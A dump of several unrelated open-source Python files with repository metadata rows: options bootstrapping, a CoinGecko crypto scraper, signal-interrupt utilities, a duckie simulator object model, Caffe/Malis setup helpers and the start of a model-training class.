# Stop before '--' since args after that are pass-through and may have duplicate names to our
# bootstrap options.
bargs = tuple(filter(is_bootstrap_option, itertools.takewhile(lambda arg: arg != '--', args)))
config_file_paths = cls.get_config_file_paths(env=env, args=args)
config_files_products = [filecontent_for(p) for p in config_file_paths]
pre_bootstrap_config = Config.load_file_contents(config_files_products)
initial_bootstrap_options = cls.parse_bootstrap_options(env, bargs, pre_bootstrap_config)
bootstrap_option_values = initial_bootstrap_options.for_global_scope()
# Now re-read the config, post-bootstrapping. Note the order: First whatever we bootstrapped
# from (typically pants.ini), then config override, then rcfiles.
full_configpaths = pre_bootstrap_config.sources()
if bootstrap_option_values.pantsrc:
rcfiles = [os.path.expanduser(str(rcfile)) for rcfile in bootstrap_option_values.pantsrc_files]
existing_rcfiles = list(filter(os.path.exists, rcfiles))
full_configpaths.extend(existing_rcfiles)
full_config_files_products = [filecontent_for(p) for p in full_configpaths]
post_bootstrap_config = Config.load_file_contents(
full_config_files_products,
seed_values=bootstrap_option_values
)
env_tuples = tuple(sorted(env.items(), key=lambda x: x[0]))
return cls(env_tuples=env_tuples, bootstrap_args=bargs, args=args, config=post_bootstrap_config)
@memoized_property
def env(self):
return dict(self.env_tuples)
@memoized_property
def bootstrap_options(self):
"""The post-bootstrap options, computed from the env, args, and fully discovered Config.
Re-computing options after Config has been fully expanded allows us to pick up bootstrap values
(such as backends) from a config override file, for example.
Because this can be computed from the in-memory representation of these values, it is not part
of the object's identity.
"""
return self.parse_bootstrap_options(self.env, self.bootstrap_args, self.config)
def get_bootstrap_options(self):
""":returns: an Options instance that only knows about the bootstrap options.
:rtype: :class:`Options`
"""
return self.bootstrap_options
@memoized_method
def _full_options(self, known_scope_infos):
bootstrap_option_values = self.get_bootstrap_options().for_global_scope()
options = Options.create(self.env,
self.config,
known_scope_infos,
args=self.args,
bootstrap_option_values=bootstrap_option_values)
distinct_optionable_classes = set()
for ksi in sorted(known_scope_infos, key=lambda si: si.scope):
if not ksi.optionable_cls or ksi.optionable_cls in distinct_optionable_classes:
continue
distinct_optionable_classes.add(ksi.optionable_cls)
ksi.optionable_cls.register_options_on_scope(options)
return options
def get_full_options(self, known_scope_infos):
"""Get the full Options instance bootstrapped by this object for the given known scopes.
:param known_scope_infos: ScopeInfos for all scopes that may be encountered.
:returns: A bootrapped Options instance that also carries options for all the supplied known
scopes.
:rtype: :class:`Options`
"""
return self._full_options(tuple(sorted(set(known_scope_infos))))
def verify_configs_against_options(self, options):
"""Verify all loaded configs have correct scopes and options.
:param options: Fully bootstrapped valid options.
:return: None.
"""
error_log = []
for config in self.config.configs():
for section in config.sections():
if section == GLOBAL_SCOPE_CONFIG_SECTION:
scope = GLOBAL_SCOPE
else:
scope = section
try:
valid_options_under_scope = set(options.for_scope(scope))
# Only catch ConfigValidationError. Other exceptions will be raised directly.
except Config.ConfigValidationError:
error_log.append("Invalid scope [{}] in {}".format(section, config.configpath))
else:
# All the options specified under [`section`] in `config` excluding bootstrap defaults.
all_options_under_scope = (set(config.configparser.options(section)) -
set(config.configparser.defaults()))
for option in all_options_under_scope:
if option not in valid_options_under_scope:
error_log.append("Invalid option '{}' under [{}] in {}".format(option, section, config.configpath))
if error_log:
for error in error_log:
logger.error(error)
raise Config.ConfigValidationError("Invalid config entries detected. "
"See log for details on which entries to update or remove.\n"
"(Specify --no-verify-config to disable this check.)")
| 40.913223 | 113 | 0.710231 |
795bba0563a95eb5c132aab78156353860ff8405 | 14,172 | py | Python | gamestonk_terminal/cryptocurrency/discovery/pycoingecko_model.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | [
"MIT"
] | 3 | 2021-02-28T09:54:47.000Z | 2021-03-11T17:42:35.000Z | gamestonk_terminal/cryptocurrency/discovery/pycoingecko_model.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | [
"MIT"
] | 3 | 2022-02-28T03:37:52.000Z | 2022-02-28T03:37:53.000Z | gamestonk_terminal/cryptocurrency/discovery/pycoingecko_model.py | Aerex/GamestonkTerminal | 680e0cd278f0d8e45031cdc9d51f247e9aa90ce1 | [
"MIT"
] | 1 | 2021-11-20T16:09:48.000Z | 2021-11-20T16:09:48.000Z | """CoinGecko model"""
__docformat__ = "numpy"
import pandas as pd
from pycoingecko import CoinGeckoAPI
from gamestonk_terminal.cryptocurrency.dataframe_helpers import (
percent_to_float,
create_df_index,
wrap_text_in_df,
)
from gamestonk_terminal.cryptocurrency.pycoingecko_helpers import (
changes_parser,
replace_qm,
clean_row,
collateral_auditors_parse,
swap_columns,
scrape_gecko_data,
get_btc_price,
GECKO_BASE_URL,
)
PERIODS = {
"1h": "?time=h1",
"24h": "?time=h24",
"7d": "?time=d7",
"14d": "?time=d14",
"30d": "?time=d30",
"60d": "?time=d60",
"1y": "?time=y1",
}
CATEGORIES = {
"trending": 0,
"most_voted": 1,
"positive_sentiment": 2,
"recently_added": 3,
"most_visited": 4,
}
def get_gainers_or_losers(period: str = "1h", typ: str = "gainers") -> pd.DataFrame:
"""Scrape data about top gainers - coins which gain the most in given period and
top losers - coins that lost the most in given period of time. [Source: CoinGecko]
Parameters
----------
period: str
One from [1h, 24h, 7d, 14d, 30d, 60d, 1y]
typ: str
Either "gainers" or "losers"
Returns
-------
pandas.DataFrame
Top Gainers / Top Losers - coins which gain/lost most in price in given period of time.
Columns: Symbol, Name, Volume, Price, %Change_{period}, Url
"""
category = {
"gainers": 0,
"losers": 1,
}
if period not in PERIODS:
raise ValueError(
f"Wrong time period\nPlease chose one from list: {PERIODS.keys()}"
)
url = f"https://www.coingecko.com/en/coins/trending{PERIODS.get(period)}"
rows = scrape_gecko_data(url).find_all("tbody")[category.get(typ)].find_all("tr")
results = []
for row in rows:
url = GECKO_BASE_URL + row.find("a")["href"]
symbol, name, *_, volume, price, change = clean_row(row)
try:
change = percent_to_float(change)
except (ValueError, TypeError) as e:
print(e)
results.append([symbol, name, volume, price, change, url])
df = pd.DataFrame(
results,
columns=[
"Symbol",
"Name",
"Volume",
"Price",
f"%Change_{period}",
"Url",
],
)
df.index = df.index + 1
df.reset_index(inplace=True)
df = df.rename(columns={"index": "Rank"})
df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
return df
def get_discovered_coins(category: str = "trending") -> pd.DataFrame:
"""Scrapes data from "https://www.coingecko.com/en/discover" [Source: CoinGecko]
- Most voted coins
- Most popular coins
- Recently added coins
- Most positive sentiment coins
Parameters
----------
category: str
- one from list: [trending, most_voted, positive_sentiment,recently_added, most_visited]
Returns
-------
pandas.DataFrame:
Most voted, most trending, recently added, most positive sentiment coins.
Columns: Name, Price_BTC, Price_USD, Url
"""
if category not in CATEGORIES:
raise ValueError(
f"Wrong category name\nPlease chose one from list: {CATEGORIES.keys()}"
)
url = "https://www.coingecko.com/en/discover"
popular = scrape_gecko_data(url).find_all(
"div", class_="col-12 col-sm-6 col-md-6 col-lg-4"
)[CATEGORIES[category]]
rows = popular.find_all("a")
results = []
btc_price = get_btc_price()
for row in rows:
name, *_, price = clean_row(row)
url = GECKO_BASE_URL + row["href"]
if price.startswith("BTC"):
price = price.replace("BTC", "").replace(",", ".")
price_usd = (int(btc_price) * float(price)) if btc_price else None
results.append([name, price, price_usd, url])
return pd.DataFrame(
results,
columns=[
"Name",
"Price_BTC",
"Price_USD",
"Url",
],
)
def get_recently_added_coins() -> pd.DataFrame:
"""Scrape recently added coins on CoinGecko from "https://www.coingecko.com/en/coins/recently_added"
[Source: CoinGecko]
Returns
-------
pandas.DataFrame
Recently Added Coins on CoinGecko
Columns: Name, Symbol, Price, Change_1h, Change_24h, Added
"""
columns = [
"Name",
"Symbol",
"Price",
"Change_1h",
"Change_24h",
"Added",
"Url",
]
url = "https://www.coingecko.com/en/coins/recently_added"
rows = scrape_gecko_data(url).find("tbody").find_all("tr")
results = []
for row in rows:
url = GECKO_BASE_URL + row.find("a")["href"]
row_cleaned = clean_row(row)
(
name,
symbol,
_,
price,
*changes,
_,
_volume,
last_added,
) = row_cleaned
change_1h, change_24h, _ = changes_parser(changes)
results.append([name, symbol, price, change_1h, change_24h, last_added, url])
df = replace_qm(pd.DataFrame(results, columns=columns))
df.index = df.index + 1
df.reset_index(inplace=True)
df.rename(columns={"index": "Rank"}, inplace=True)
df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
return df
def get_yield_farms() -> pd.DataFrame:
"""Scrapes yield farms data from "https://www.coingecko.com/en/yield-farming" [Source: CoinGecko]
Returns
-------
pandas.DataFrame
Top Yield Farms
Columns: Rank, Name, Pool, Audits, Collateral, Value Locked, Return Year, Return Hour
"""
columns = [
"Rank",
"Name",
"Pool",
"Audits",
"Collateral",
"Value_Locked",
"Return_Year",
]
url = "https://www.coingecko.com/en/yield-farming"
rows = scrape_gecko_data(url).find("tbody").find_all("tr")
results = []
for row in rows:
row_cleaned = clean_row(row)[:-2]
if " New" in row_cleaned: # find better way to fix it in future
row_cleaned.remove(" New")
if len(row_cleaned) == 7:
row_cleaned.insert(2, None)
(
rank,
name,
pool,
*others,
_,
value_locked,
apy1,
_, # hourly removed for most cases it's 0.00 so it doesn't bring any value for user
) = row_cleaned
auditors, collateral = collateral_auditors_parse(others)
auditors = ", ".join(aud.strip() for aud in auditors)
collateral = ", ".join(coll.strip() for coll in collateral)
results.append(
[
rank,
name,
pool,
auditors,
collateral,
value_locked,
apy1,
]
)
df = pd.DataFrame(results, columns=columns).replace({"": None})
for col in ["Return_Year"]:
df[col] = df[col].apply(
lambda x: x.replace(" Yearly", "") if isinstance(x, str) else x
)
df["Rank"] = df["Rank"].astype(int)
df = wrap_text_in_df(df, w=30)
return df
def get_top_volume_coins() -> pd.DataFrame:
"""Scrapes top coins by trading volume "https://www.coingecko.com/en/coins/high_volume" [Source: CoinGecko]
Returns
-------
pandas.DataFrame
Top Coins by Trading Volume
Columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap
"""
columns = [
"Rank",
"Name",
"Symbol",
"Price",
"Change_1h",
"Change_24h",
"Change_7d",
"Volume_24h",
"Market_Cap",
]
url = "https://www.coingecko.com/en/coins/high_volume"
rows = scrape_gecko_data(url).find("tbody").find_all("tr")
results = []
for row in rows:
row_cleaned = clean_row(row)
if len(row_cleaned) == 9:
row_cleaned.insert(0, "?")
row_cleaned.pop(3)
results.append(row_cleaned)
df = replace_qm(pd.DataFrame(results, columns=columns))
df.drop("Rank", axis=1, inplace=True)
create_df_index(df, "Rank")
df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
return df
def get_top_defi_coins() -> pd.DataFrame:
"""Scrapes top decentralized finance coins "https://www.coingecko.com/en/defi" [Source: CoinGecko]
Returns
-------
pandas.DataFrame
Top Decentralized Finance Coins
Columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap, Url
"""
url = "https://www.coingecko.com/en/defi"
rows = scrape_gecko_data(url).find("tbody").find_all("tr")
results = []
for row in rows:
row_cleaned = clean_row(row)
row_cleaned.pop(2)
url = GECKO_BASE_URL + row.find("a")["href"]
row_cleaned.append(url)
if len(row_cleaned) == 11:
row_cleaned.insert(4, "?")
results.append(row_cleaned)
df = pd.DataFrame(
results,
columns=[
"Rank",
"Name",
"Symbol",
"Price",
"Change_1h",
"Change_24h",
"Change_7d",
"Volume_24h",
"Market_Cap",
"Fully Diluted Market Cap",
"Market Cap to TVL Ratio",
"Url",
],
)
df.drop(
["Fully Diluted Market Cap", "Market Cap to TVL Ratio"],
axis=1,
inplace=True,
)
df["Rank"] = df["Rank"].astype(int)
df["Price"] = df["Price"].apply(lambda x: float(x.strip("$").replace(",", "")))
return df
def get_top_dexes() -> pd.DataFrame:
"""Scrapes top decentralized exchanges from "https://www.coingecko.com/en/dex" [Source: CoinGecko]
Returns
-------
pandas.DataFrame
Top Decentralized Crypto Exchanges
Columns: Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share
"""
columns = [
"Name",
"Rank",
"Volume_24h",
"Coins",
"Pairs",
"Visits",
"Most_Traded",
"Market_Share",
]
url = "https://www.coingecko.com/en/dex"
rows = scrape_gecko_data(url).find("tbody").find_all("tr")
results = []
for row in rows:
row_cleaned = clean_row(row)
if " Trading Incentives" in row_cleaned:
row_cleaned.remove(" Trading Incentives")
if len(row_cleaned) == 8:
row_cleaned.insert(-3, "N/A")
results.append(row_cleaned)
df = pd.DataFrame(results)
df["Name"] = df.iloc[:, 1] + " " + df.iloc[:, 2].replace("N/A", "")
df.drop(df.columns[1:3], axis=1, inplace=True)
df = swap_columns(df)
df.columns = columns
df["Most_Traded"] = (
df["Most_Traded"]
.apply(lambda x: x.split("$")[0])
.str.replace(",", "", regex=True)
.str.replace(".", "", regex=True)
)
df["Most_Traded"] = df["Most_Traded"].apply(lambda x: None if x.isdigit() else x)
df["Rank"] = df["Rank"].astype(int)
df.set_index("Rank", inplace=True)
return df.reset_index()
def get_top_nfts() -> pd.DataFrame:
"""Scrapes top nfts from "https://www.coingecko.com/en/nft" [Source: CoinGecko]
Returns
-------
pandas.DataFrame
Top NFTs (Non-Fungible Tokens)
Columns: Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap, Url
"""
url = "https://www.coingecko.com/en/nft"
rows = scrape_gecko_data(url).find("tbody").find_all("tr")
results = []
for row in rows:
link = GECKO_BASE_URL + row.find("a")["href"]
row_cleaned = clean_row(row)
if len(row_cleaned) == 9:
row_cleaned.insert(5, "N/A")
row_cleaned.append(link)
row_cleaned.pop(3)
results.append(row_cleaned)
df = pd.DataFrame(
results,
columns=[
"Rank",
"Name",
"Symbol",
"Price",
"Change_1h",
"Change_24h",
"Change_7d",
"Volume_24h",
"Market_Cap",
"Url",
],
)
df["Rank"] = df["Rank"].astype(int)
df["Price"] = df["Price"].apply(lambda x: x.strip("$").replace(",", ""))
return df
def get_coin_list() -> pd.DataFrame:
"""Get list of coins available on CoinGecko [Source: CoinGecko]
Returns
-------
pandas.DataFrame
Coins available on CoinGecko
Columns: id, symbol, name
"""
client = CoinGeckoAPI()
return pd.DataFrame(
client.get_coins_list(),
columns=["id", "symbol", "name"],
).reset_index()
def get_coins_for_given_exchange(exchange_id: str = "binance", page: int = 1) -> dict:
"""Helper method to get all coins available on binance exchange [Source: CoinGecko]
Parameters
----------
exchange_id: str
id of exchange
page: int
number of page. One page contains 100 records
Returns
-------
dict
dictionary with all trading pairs on binance
"""
client = CoinGeckoAPI()
binance_coins = client.get_exchanges_tickers_by_id(id=exchange_id, page=page)
return binance_coins["tickers"]
def get_mapping_matrix_for_exchange(exchange_id: str, pages: int = 12) -> dict:
"""Creates a matrix with all coins available on Binance with corresponding coingecko coin_id. [Source: CoinGecko]
Parameters
----------
exchange_id: str
id of exchange: binance
pages: int
number of pages. One page contains 100 records
Returns
-------
dict
dictionary with all coins: {"ETH" : "ethereum"}
"""
coins_dct = {}
for i in range(pages):
coins = get_coins_for_given_exchange(exchange_id=exchange_id, page=i)
for coin in coins:
bin_symbol, gecko_id = coin["base"], coin["coin_id"]
if bin_symbol not in coins_dct:
coins_dct[bin_symbol] = gecko_id
return coins_dct
| 28.688259 | 117 | 0.567951 |
795bba4d7f02a170d14d75e7fd70811599931c83 | 2,828 | py | Python | python_modules/dagster/dagster/utils/interrupts.py | souterjk/dagster | 8b744a4959bb04ff9587cfee82a796404fcbc89e | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/utils/interrupts.py | souterjk/dagster | 8b744a4959bb04ff9587cfee82a796404fcbc89e | [
"Apache-2.0"
] | null | null | null | python_modules/dagster/dagster/utils/interrupts.py | souterjk/dagster | 8b744a4959bb04ff9587cfee82a796404fcbc89e | [
"Apache-2.0"
] | 1 | 2019-09-11T03:02:27.000Z | 2019-09-11T03:02:27.000Z | import signal
import sys
import threading
from contextlib import contextmanager
_received_interrupt = {"received": False}
def setup_interrupt_handlers():
# Map SIGTERM to SIGINT (for k8s)
signal.signal(signal.SIGTERM, signal.getsignal(signal.SIGINT))
# Set SIGBREAK handler to SIGINT on Windows
if sys.platform == "win32":
signal.signal(signal.SIGBREAK, signal.getsignal(signal.SIGINT)) # pylint: disable=no-member
def _replace_interrupt_signal(new_signal_handler):
signal.signal(signal.SIGINT, new_signal_handler)
# Update any overridden signals to also use the new handler
setup_interrupt_handlers()
# Wraps code that we don't want a SIGINT to be able to interrupt. Within this context you can
# use pop_captured_interrupt or check_captured_interrupt to check whether or not an interrupt
# has been received within checkpoitns. You can also use additional context managers (like
# raise_execution_interrupts) to override the interrupt signal handler again.
@contextmanager
def capture_interrupts():
if threading.current_thread() != threading.main_thread():
# Can't replace signal handlers when not on the main thread, ignore
yield
return
original_signal_handler = signal.getsignal(signal.SIGINT)
def _new_signal_handler(_signo, _):
_received_interrupt["received"] = True
signal_replaced = False
try:
_replace_interrupt_signal(_new_signal_handler)
signal_replaced = True
yield
finally:
if signal_replaced:
_replace_interrupt_signal(original_signal_handler)
_received_interrupt["received"] = False
def check_captured_interrupt():
return _received_interrupt["received"]
def pop_captured_interrupt():
ret = _received_interrupt["received"]
_received_interrupt["received"] = False
return ret
# During execution, enter this context during a period when interrupts should be raised immediately
# (as a DagsterExecutionInterruptedError instead of a KeyboardInterrupt)
@contextmanager
def raise_interrupts_as(error_cls):
if threading.current_thread() != threading.main_thread():
# Can't replace signal handlers when not on the main thread, ignore
yield
return
original_signal_handler = signal.getsignal(signal.SIGINT)
def _new_signal_handler(signo, _):
raise error_cls()
signal_replaced = False
try:
_replace_interrupt_signal(_new_signal_handler)
signal_replaced = True
# Raise if the previous signal handler received anything
if _received_interrupt["received"]:
_received_interrupt["received"] = False
raise error_cls()
yield
finally:
if signal_replaced:
_replace_interrupt_signal(original_signal_handler)
| 31.076923 | 100 | 0.730552 |
795bba8377d816082a3c25d3bcbb76119e07e29d | 6,079 | py | Python | gym_duckietown/objects.py | abdelq/gym-duckietown | 189392eab698b26db5e253b2a7fbe063b6e5e410 | [
"MIT"
] | null | null | null | gym_duckietown/objects.py | abdelq/gym-duckietown | 189392eab698b26db5e253b2a7fbe063b6e5e410 | [
"MIT"
] | null | null | null | gym_duckietown/objects.py | abdelq/gym-duckietown | 189392eab698b26db5e253b2a7fbe063b6e5e410 | [
"MIT"
] | null | null | null | import numpy as np
from .collision import *
import pyglet
from pyglet.gl import *
class WorldObj:
def __init__(self, obj, domain_rand, safety_radius_mult):
"""
Initializes the object and its properties
"""
self.process_obj_dict(obj, safety_radius_mult)
self.domain_rand = domain_rand
self.angle = self.y_rot * (math.pi / 180)
self.generate_geometry()
def generate_geometry(self):
# Find corners and normal vectors assoc w. object
self.obj_corners = generate_corners(self.pos,
self.min_coords, self.max_coords, self.angle, self.scale)
self.obj_norm = generate_norm(self.obj_corners)
def process_obj_dict(self, obj, safety_radius_mult):
self.kind = obj['kind']
self.mesh = obj['mesh']
self.pos = obj['pos']
self.scale = obj['scale']
self.y_rot = obj['y_rot']
self.optional = obj['optional']
self.min_coords = obj['mesh'].min_coords
self.max_coords = obj['mesh'].max_coords
self.static = obj['static']
self.safety_radius = safety_radius_mult *\
calculate_safety_radius(self.mesh, self.scale)
self.optional = obj['optional']
def render(self, draw_bbox):
"""
Renders the object to screen
"""
if not self.visible:
return
# Draw the bounding box
if draw_bbox:
glColor3f(1, 0, 0)
glBegin(GL_LINE_LOOP)
glVertex3f(self.obj_corners.T[0, 0], 0.01, self.obj_corners.T[1, 0])
glVertex3f(self.obj_corners.T[0, 1], 0.01, self.obj_corners.T[1, 1])
glVertex3f(self.obj_corners.T[0, 2], 0.01, self.obj_corners.T[1, 2])
glVertex3f(self.obj_corners.T[0, 3], 0.01, self.obj_corners.T[1, 3])
glEnd()
glPushMatrix()
glTranslatef(*self.pos)
glScalef(self.scale, self.scale, self.scale)
glRotatef(self.y_rot, 0, 1, 0)
glColor3f(*self.color)
self.mesh.render()
glPopMatrix()
# Below are the functions that need to
# be reimplemented for any dynamic object
def check_collision(self, agent_corners, agent_norm):
"""
See if the agent collided with this object
For static, return false (static collisions checked w
numpy in a batch operation)
"""
if not self.static:
raise NotImplementedError
return False
def proximity(self, agent_pos, agent_safety_rad):
"""
See if the agent is too close to this object
For static, return 0 (static safedriving checked w
numpy in a batch operation)
"""
if not self.static:
raise NotImplementedError
return 0.0
def step(self, delta_time):
"""
Use a motion model to move the object in the world
"""
if not self.static:
raise NotImplementedError
class DuckieObj(WorldObj):
def __init__(self, obj, domain_rand, safety_radius_mult, walk_distance):
super().__init__(obj, domain_rand, safety_radius_mult)
self.walk_distance = walk_distance + 0.25
# Dynamic duckie stuff
# Randomize velocity and wait time
if self.domain_rand:
self.pedestrian_wait_time = np.random.randint(3, 20)
self.vel = np.abs(np.random.normal(0.02, 0.005))
else:
self.pedestrian_wait_time = 8
self.vel = 0.02
# Movement parameters
self.heading = heading_vec(self.angle)
self.start = np.copy(self.pos)
self.center = self.pos
self.pedestrian_active = False
# Walk wiggle parameter
self.wiggle = np.random.choice([14, 15, 16], 1)
self.wiggle = np.pi / self.wiggle
self.time = 0
def check_collision(self, agent_corners, agent_norm):
"""
See if the agent collided with this object
"""
return intersects_single_obj(
agent_corners,
self.obj_corners.T,
agent_norm,
self.obj_norm
)
def proximity(self, agent_pos, agent_safety_rad):
"""
See if the agent is too close to this object
based on a heuristic for the "overlap" between
their safety circles
"""
d = np.linalg.norm(agent_pos - self.center)
score = d - agent_safety_rad - self.safety_radius
return min(0, score)
def step(self, delta_time):
"""
Use a motion model to move the object in the world
"""
self.time += delta_time
# If not walking, no need to do anything
if not self.pedestrian_active:
self.pedestrian_wait_time -= delta_time
if self.pedestrian_wait_time <= 0:
self.pedestrian_active = True
return
# Update centers and bounding box
vel_adjust = self.heading * self.vel
self.center += vel_adjust
self.obj_corners += vel_adjust[[0, -1]]
distance = np.linalg.norm(self.center - self.start)
if distance > self.walk_distance:
self.finish_walk()
self.pos = self.center
angle_delta = self.wiggle * math.sin(48 * self.time)
self.y_rot = (self.angle + angle_delta) * (180 / np.pi)
self.obj_norm = generate_norm(self.obj_corners)
def finish_walk(self):
"""
After duckie crosses, update relevant attributes
(vel, rot, wait time until next walk)
"""
self.start = np.copy(self.center)
self.angle += np.pi
self.pedestrian_active = False
if self.domain_rand:
# Assign a random velocity (in opp. direction) and a wait time
self.vel = -1 * np.sign(self.vel) * np.abs(np.random.normal(0.02, 0.005))
self.pedestrian_wait_time = np.random.randint(3, 20)
else:
# Just give it the negative of its current velocity
self.vel *= -1
self.pedestrian_wait_time = 8
| 31.827225 | 85 | 0.595822 |
795bbaf6e33f31984f169011542b14c3468a139f | 4,465 | py | Python | manual_setup/system_calls.py | Rekrau/PyGreentea | 457d7dc5be12b15c3c7663ceaf6d74301de56e43 | [
"BSD-2-Clause"
] | null | null | null | manual_setup/system_calls.py | Rekrau/PyGreentea | 457d7dc5be12b15c3c7663ceaf6d74301de56e43 | [
"BSD-2-Clause"
] | 4 | 2016-04-22T15:39:21.000Z | 2016-11-15T21:23:58.000Z | manual_setup/system_calls.py | Rekrau/PyGreentea | 457d7dc5be12b15c3c7663ceaf6d74301de56e43 | [
"BSD-2-Clause"
] | 4 | 2017-05-12T00:17:55.000Z | 2019-07-01T19:23:32.000Z | import inspect
import multiprocessing
import os
import platform
import sys
def setup_paths(caffe_path, malis_path):
cmd_folder = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))
if cmd_folder not in sys.path:
sys.path.append(cmd_folder)
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], caffe_path + "/python")))
if cmd_subfolder not in sys.path:
sys.path.append(cmd_subfolder)
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], malis_path)))
if cmd_subfolder not in sys.path:
sys.path.append(cmd_subfolder)
sys.path.append(caffe_path + "/python")
sys.path.append(malis_path + "/python")
def linux_distribution():
try:
return platform.linux_distribution()
except:
return "N/A"
def sys_info():
print("""Python version: %s
dist: %s
linux_distribution: %s
system: %s
machine: %s
platform: %s
uname: %s
version: %s
mac_ver: %s
""" % (
sys.version.split('\n'),
str(platform.dist()),
linux_distribution(),
platform.system(),
platform.machine(),
platform.platform(),
platform.uname(),
platform.version(),
platform.mac_ver(),
))
def install_dependencies():
# We support Fedora (22/23/24) and Ubuntu (14.05/15.05)
if (linux_distribution()[0].lower() == "fedora"):
# TODO: Add missing Fedora packages
os.system('dnf install -y git gcc')
os.system('dnf install -y protobuf-python protobuf-c protobuf-compiler')
os.system('dnf install -y boost-system boost-devel boost-python')
os.system('dnf install -y glog glog-devel gflags gflags-devel')
os.system('dnf install -y python python-devel python-pip')
os.system('dnf install -y atlas atlas-sse2 atlas-sse3')
os.system('dnf install -y openblas openblas-devel openblas-openmp64 openblas-openmp openblas-threads64 openblas-threads')
os.system('dnf install -y opencl-headers')
if (linux_distribution()[0].lower() == "ubuntu"):
# TODO: Add missing Ubuntu packages
os.system('apt-get update -y')
os.system('apt-get install -y git gcc')
os.system('apt-get install -y libprotobuf-dev libleveldb-dev libsnappy-dev libopencv-dev libboost-all-dev libhdf5-serial-dev')
os.system('apt-get install -y protobuf-compiler gfortran libjpeg62 libfreeimage-dev libatlas-base-dev')
os.system('apt-get install -y libopenblas-base libopenblas-dev')
os.system('apt-get install -y libgoogle-glog-dev libbz2-dev libxml2-dev libxslt-dev libffi-dev libssl-dev libgflags-dev liblmdb-dev')
os.system('apt-get install -y python-dev python-pip python-yaml')
os.system('apt-get install -y libviennacl-dev opencl-headers')
os.system('pip install --upgrade pip')
os.system('pip install cython')
def compile_malis(path):
cwd = os.getcwd()
os.chdir(path)
os.system('sh make.sh')
os.chdir(cwd)
def compile_caffe(path):
cpus = multiprocessing.cpu_count()
cwd = os.getcwd()
os.chdir(path)
# Copy the default Caffe configuration if not existing
os.system("cp -n Makefile.config.example Makefile.config")
result = os.system("make all -j %s" % cpus)
if result != 0:
sys.exit(result)
result = os.system("make pycaffe -j %s" % cpus)
if result != 0:
sys.exit(result)
os.chdir(cwd)
def clone_malis(path, clone, update):
if clone:
os.system('git clone https://github.com/srinituraga/malis.git %s' % path)
if update:
cwd = os.getcwd()
os.chdir(path)
os.system('git pull')
os.chdir(cwd)
def clone_caffe(path, clone, update):
if clone:
os.system('git clone https://github.com/naibaf7/caffe.git %s' % path)
if update:
cwd = os.getcwd()
os.chdir(path)
os.system('git pull')
os.chdir(cwd)
def set_environment_vars():
# Fix up OpenCL variables. Can interfere with the
# frame buffer if the GPU is also a display driver
os.environ["GPU_MAX_ALLOC_PERCENT"] = "100"
os.environ["GPU_SINGLE_ALLOC_PERCENT"] = "100"
os.environ["GPU_MAX_HEAP_SIZE"] = "100"
os.environ["GPU_FORCE_64BIT_PTR"] = "1"
| 34.083969 | 150 | 0.64972 |
795bbb995b2199179c32741261a83f9a18eec48a | 54 | py | Python | acmicpc/15894/15894.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 3 | 2019-03-09T05:19:23.000Z | 2019-04-06T09:26:36.000Z | acmicpc/15894/15894.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2020-02-23T10:38:04.000Z | 2020-02-23T10:38:04.000Z | acmicpc/15894/15894.py | love-adela/algorithm | 4ccd02173c96f8369962f1fd4e5166a221690fa2 | [
"MIT"
] | 1 | 2019-05-22T13:47:53.000Z | 2019-05-22T13:47:53.000Z | import sys
n = int(sys.stdin.readline())
print(4 * n)
| 13.5 | 29 | 0.666667 |
795bbbdd194aa04f498c0f4a94c9475d5eb5e2bb | 7,397 | py | Python | utils/train.py | wingeva1986/dddd_trainer | 608bfec699446040aea205387c9a2129ea5fa575 | [
"Apache-2.0"
] | 1 | 2022-03-01T00:51:46.000Z | 2022-03-01T00:51:46.000Z | utils/train.py | wingeva1986/dddd_trainer | 608bfec699446040aea205387c9a2129ea5fa575 | [
"Apache-2.0"
] | null | null | null | utils/train.py | wingeva1986/dddd_trainer | 608bfec699446040aea205387c9a2129ea5fa575 | [
"Apache-2.0"
] | null | null | null | import json
import os
import random
import time
import tqdm
from configs import Config
from loguru import logger
from utils import load_cache
from nets import Net
class Train:
def __init__(self, project_name: str):
self.project_name = project_name
self.project_path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "projects",
project_name)
self.checkpoints_path = os.path.join(self.project_path, "checkpoints")
self.models_path = os.path.join(self.project_path, "models")
self.epoch = 0
self.step = 0
self.config = Config(project_name)
self.conf = self.config.load_config()
self.test_step = self.conf['Train']['TEST_STEP']
self.save_checkpoints_step = self.conf['Train']['SAVE_CHECKPOINTS_STEP']
self.target = self.conf['Train']['TARGET']
self.target_acc = self.target['Accuracy']
self.min_epoch = self.target['Epoch']
self.max_loss = self.target['Cost']
logger.info("\nTaget:\nmin_Accuracy: {}\nmin_Epoch: {}\nmax_Loss: {}".format(self.target_acc, self.min_epoch,
self.max_loss))
logger.info("\nBuilding Net...")
self.net = Net(self.conf)
logger.info(self.net)
logger.info("\nBuilding End")
self.use_gpu = self.conf['System']['GPU']
if self.use_gpu:
self.gpu_id = self.conf['System']['GPU_ID']
logger.info("\nUSE GPU ----> {}".format(self.gpu_id))
self.device = self.net.get_device(self.gpu_id)
self.net.to(self.device)
else:
self.gpu_id = -1
self.device = self.net.get_device(self.gpu_id)
logger.info("\nUSE CPU".format(self.gpu_id))
logger.info("\nSearch for history checkpoints...")
history_checkpoints = os.listdir(self.checkpoints_path)
if len(history_checkpoints) > 0:
history_step = 0
